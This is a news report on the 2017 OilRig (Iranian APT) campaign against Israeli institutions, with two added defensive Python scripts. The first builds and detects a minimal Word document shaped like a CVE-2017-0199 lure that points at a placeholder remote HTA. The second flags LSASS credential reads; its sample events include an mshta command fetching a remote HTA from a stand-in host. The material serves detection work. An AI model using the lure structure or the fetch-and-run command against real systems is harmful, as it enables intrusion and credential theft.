Israeli authorities initially blamed an unnamed foreign state for the massive cyber espionage campaign against major Israeli institutions and government officials; the Israeli Cyber Defense Authority now attributes the attack to Iranian state-sponsored hackers.
According to the Israeli Cyber Defense Authority, the hackers targeted some 250 individuals between April 19 and 24 across several sectors, including government agencies, high-tech companies, medical organizations, and educational institutions.
Among the targets were experts at the renowned Ben-Gurion University, which hosts advanced research programs. The threat actors used compromised Ben-Gurion email accounts to deliver the malware to their victims.
“From April 19-24, 2017, a politically-motivated, targeted campaign was carried out against numerous Israeli organizations. Morphisec researchers began investigating the attacks on April 24 and continue to uncover more details. Initial reports of the attacks, published April 26 (in Hebrew) by the Israel National Cyber Event Readiness Team (CERT-IL) and The Marker, confirm that the attack was delivered through compromised email accounts at Ben-Gurion University and sent to multiple targets across Israel. Ironically, Ben-Gurion University is home to Israel’s Cyber Security Research Center.” reads the analysis shared by Morphisec. “Investigators put the origin of the attack as Iranian; Morphisec’s research supports this conclusion and attributes the attacks to the same infamous hacker group responsible for the OilRig malware campaigns.“
The exploitation of this particular flaw marks a technical step forward for the OilRig APT group. Unlike macro-based lures, the attack does not depend on the victim enabling content: the weaponized Word document carries a linked OLE object whose embedded link points to a remote HTML Application (HTA), which Word retrieves and executes when the document is opened.
“The attack was delivered via Microsoft Word documents that exploited a former zero-day vulnerability in Word, CVE-2017-0199, by actually reusing an existing PoC that had been published immediately after the patch release. Microsoft released the patch for the vulnerability on April 11 but many organizations have not yet deployed the update. The delivered documents installed a fileless variant of the Helminth Trojan agent.” continues the analysis.
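What such a document actually carries, as an added illustration (not code from the article or from Morphisec's report): in the .docx form of a CVE-2017-0199 lure, the package holds a linked OLE object (Type="Link", UpdateMode="Always") whose relationship in word/_rels/document.xml.rels has TargetMode="External" and points at a remote URL; when Word refreshes the link on open it fetches the HTA and hands it to mshta.exe. The script below builds a constructed minimal sample with a placeholder URL (example.invalid) and a benign control document, then checks any .docx for that pattern. It covers only the OOXML variant; the RTF variant (\objautlink with \objupdate) needs a separate parser, and for real triage oletools' oleobj is the better tool.

```python
import io
import re
import zipfile

OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")

# --- Constructed samples (not the real documents analysed by Morphisec) ---

def _pack_docx(document_xml, rels_xml):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", '<?xml version="1.0"?><Types xmlns='
                   '"http://schemas.openxmlformats.org/package/2006/content-types"/>')
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()

def build_linked_ole_docx(target_url):
    """Minimal .docx with a linked, auto-updating OLE object whose relationship
    target lies outside the package: the shape of a CVE-2017-0199 lure.
    target_url is a placeholder supplied by the caller for this example."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
        ' xmlns:o="urn:schemas-microsoft-com:office:office"'
        ' xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">'
        '<w:body><w:p><w:r><w:object>'
        '<o:OLEObject Type="Link" ProgID="Word.Document.8" ShapeID="_x0000_i1025"'
        ' DrawAspect="Content" r:id="rId5" UpdateMode="Always"/>'
        '</w:object></w:r></w:p></w:body></w:document>'
    )
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">'
        '<Relationship Id="rId5" Type="{}" Target="{}" TargetMode="External"/>'
        '</Relationships>'
    ).format(OLE_REL_TYPE, target_url)
    return _pack_docx(document_xml, rels_xml)

def build_benign_docx():
    """Control document: plain text, no OLE objects, no external relationships."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        '<w:body><w:p><w:r><w:t>Quarterly report</w:t></w:r></w:p></w:body></w:document>'
    )
    rels_xml = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        '<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>'
    )
    return _pack_docx(document_xml, rels_xml)

# --- Detection ---

def _attrs(tag_body):
    """Parse the attributes of one XML start tag into a dict."""
    return dict(re.findall(r'([\w:]+)="([^"]*)"', tag_body))

def find_external_ole_links(docx_bytes):
    """One record per OLE object whose relationship points outside the package,
    joined with the object's Type/UpdateMode attributes from document.xml."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if not {"word/document.xml", "word/_rels/document.xml.rels"} <= set(z.namelist()):
            return []
        document = z.read("word/document.xml").decode("utf-8", "replace")
        rels = z.read("word/_rels/document.xml.rels").decode("utf-8", "replace")

    external = {}
    for m in re.finditer(r"<Relationship\b([^>]*)>", rels):
        a = _attrs(m.group(1))
        if a.get("Type") == OLE_REL_TYPE and a.get("TargetMode") == "External":
            external[a.get("Id")] = a.get("Target", "")

    findings = []
    for m in re.finditer(r"<o:OLEObject\b([^>]*)>", document):
        a = _attrs(m.group(1))
        rid = a.get("r:id")
        if rid in external:
            target = external[rid]
            findings.append({
                "rid": rid,
                "target": target,
                "linked": a.get("Type") == "Link",
                # UpdateMode="Always" makes Word refresh the link when the file opens.
                "auto_update": a.get("UpdateMode") == "Always",
                "remote": target.lower().startswith(("http://", "https://")),
                # Informational only: the server can serve an HTA under any name.
                "hta": target.lower().split("?", 1)[0].endswith(".hta"),
            })
    return findings

def looks_like_cve_2017_0199_lure(docx_bytes):
    """True when a linked, auto-updating OLE object pulls from a remote URL."""
    return any(f["linked"] and f["auto_update"] and f["remote"]
               for f in find_external_ole_links(docx_bytes))

if __name__ == "__main__":
    sample = build_linked_ole_docx("http://example.invalid/template.hta")
    print(find_external_ole_links(sample))
    print(looks_like_cve_2017_0199_lure(sample), looks_like_cve_2017_0199_lure(build_benign_docx()))
```

The verdict deliberately keys on the link semantics (linked object, refreshed on open, remote target) rather than on the .hta suffix, because the payload URL in a real lure need not end in .hta; the suffix is reported only as a supporting indicator.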
Experts at Morphisec also found that the attackers used a customized build of the open-source Mimikatz tool to extract credentials from the Windows Local Security Authority Subsystem Service (LSASS).
“Morphisec identified a few more samples of communication with other C&C servers (“alenupdate[.]info” and “maralen[.]tk”) in which a more advanced customized version of Mimikatz has been sent to specific users and additional agents have been installed in the “C:\Program Files (x86)\Microsoft Idle\” directory:” states Morphisec.
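On the detection side, a customized Mimikatz build may defeat signatures, but it still has to open a handle to lsass.exe with PROCESS_VM_READ to read credential material, and Sysmon records every such handle open as Event ID 10 (ProcessAccess). The script below is an added example, not code from the article or from Morphisec's report: it parses constructed Sysmon-style events flattened to key=value lines and flags LSASS reads from images outside an assumed allowlist. Only the “Microsoft Idle” directory comes from the report; the file names update.exe and agent.exe, the user name, and the allowlist itself are placeholders.

```python
import re

PROCESS_VM_READ = 0x0010  # access right required to read LSASS memory

# Assumed allowlist of images that routinely open LSASS on a Windows host.
# It must be tuned per environment; path-only allowlisting is a starting point, not a control.
KNOWN_LSASS_READERS = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\svchost.exe",
}

# Constructed events in the shape of Sysmon Event ID 10 (and one Event ID 1),
# flattened to key=value lines. These are not telemetry from the OilRig intrusions;
# update.exe, agent.exe and the user name are placeholders.
SAMPLE_EVENTS = [
    "EventID=10 SourceImage=C:\\Windows\\System32\\csrss.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1FFFFF",
    "EventID=10 SourceImage=C:\\Users\\alice\\AppData\\Local\\Temp\\update.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1010",
    "EventID=10 SourceImage=C:\\Program Files (x86)\\Microsoft Idle\\agent.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1410",
    "EventID=10 SourceImage=C:\\Windows\\System32\\svchost.exe "
    "TargetImage=C:\\Windows\\System32\\lsass.exe GrantedAccess=0x1400",
    "EventID=1 Image=C:\\Windows\\System32\\mshta.exe "
    "CommandLine=mshta.exe http://example.invalid/x.hta",
    "EventID=10 SourceImage=C:\\Windows\\System32\\WerFault.exe "
    "TargetImage=C:\\Windows\\explorer.exe GrantedAccess=0x1010",
]

def parse_event(line):
    """Split 'k=v k=v ...' into a dict. Values may contain spaces (paths with
    'Program Files (x86)') but are assumed never to contain ' word='."""
    return dict(re.findall(r"(\w+)=(.*?)(?= \w+=|$)", line))

def flag_lsass_access(lines):
    """Return LSASS handle opens that include PROCESS_VM_READ and originate from
    an image outside the allowlist. GrantedAccess is the hex mask Sysmon logs."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "10":
            continue
        if not ev.get("TargetImage", "").lower().endswith("\\lsass.exe"):
            continue
        granted = int(ev.get("GrantedAccess", "0x0"), 16)
        if not granted & PROCESS_VM_READ:
            continue  # handle cannot read LSASS memory, so no dump is possible
        source = ev.get("SourceImage", "")
        if source.lower() in KNOWN_LSASS_READERS:
            continue
        hits.append({"source": source, "granted": hex(granted)})
    return hits

if __name__ == "__main__":
    for hit in flag_lsass_access(SAMPLE_EVENTS):
        print(hit)
```

The rule tests the PROCESS_VM_READ bit rather than matching a fixed list of masks such as 0x1010 or 0x1410, so a tool that requests an unusual combination of rights is still caught; tuning then happens in the allowlist, where the false positives live.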
Earlier this year, the OilRig APT was linked to a string of cyber attacks that targeted several Israeli organizations, including IT vendors, the national postal service, and financial institutions.